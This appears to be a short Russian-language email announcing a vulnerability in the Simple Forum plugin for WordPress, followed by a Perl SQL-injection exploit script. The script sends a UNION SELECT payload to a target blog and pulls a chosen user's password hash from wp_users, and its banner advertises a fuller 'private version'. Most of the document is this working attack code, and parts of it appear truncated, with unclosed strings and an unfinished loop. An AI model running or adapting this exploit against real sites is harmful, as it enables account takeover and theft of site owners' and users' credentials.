Добрый день. Я нашел уязвимость в форме Simple Forum для движка WordPress.
Решил первыми осведомить вас! :)
Через пару минут буду отсылать на milw0rm
#!/usr/bin/perl
use IO::Socket;
if (@ARGV <4)
{
print q(
###############################################################################
Simple Forum (for WordPress) sql-inject exploit (public version)
Tested on SF version 1.0, 1.1, 1.9 and WordPress 2.1.0, 2.1.1, 2.1.2
This exploit gives you selected user passwd hash,
for more features use Private Version
Discovered and coded by FrenzY ( [email protected])
— Public Version —
ex: if http://www.somefuckingblog.com/?page_id=3
cmd> perl simpleforum_wp.pl http://www.somefuckingblog.com / 1 3 > sfb.txt
(i recomend to use file output, because result may be non-readable from the
CMD :-))
###############################################################################
);
exit;
}
###############################################################################
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$pid = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "\r\n";
print "We are going to make a sql-inject at $serv now\r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$path = $dir;
$path .= '?page_id=';
$path .= $pid;
$path .=
'&forum=1%20and%201=0%20UNION%20SELECT%201,user_pass,3,4,5,6,7%20FROM%20wp_users%20WHERE%20ID=';
$path .= $uid;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv",
PeerPort => "80") || die "[-] CONNECT FAILED :-(\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: /\n";
print $socket "Connection: close\n\n";
$i = 0;
while ($answer = <$socket>)
{
if ($answer =~ /Currently Online/) { print "- - - - - - - - - - - - - - - -
print "[-] EXPLOITING FAILED :-( \r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
–
Love,
Ivan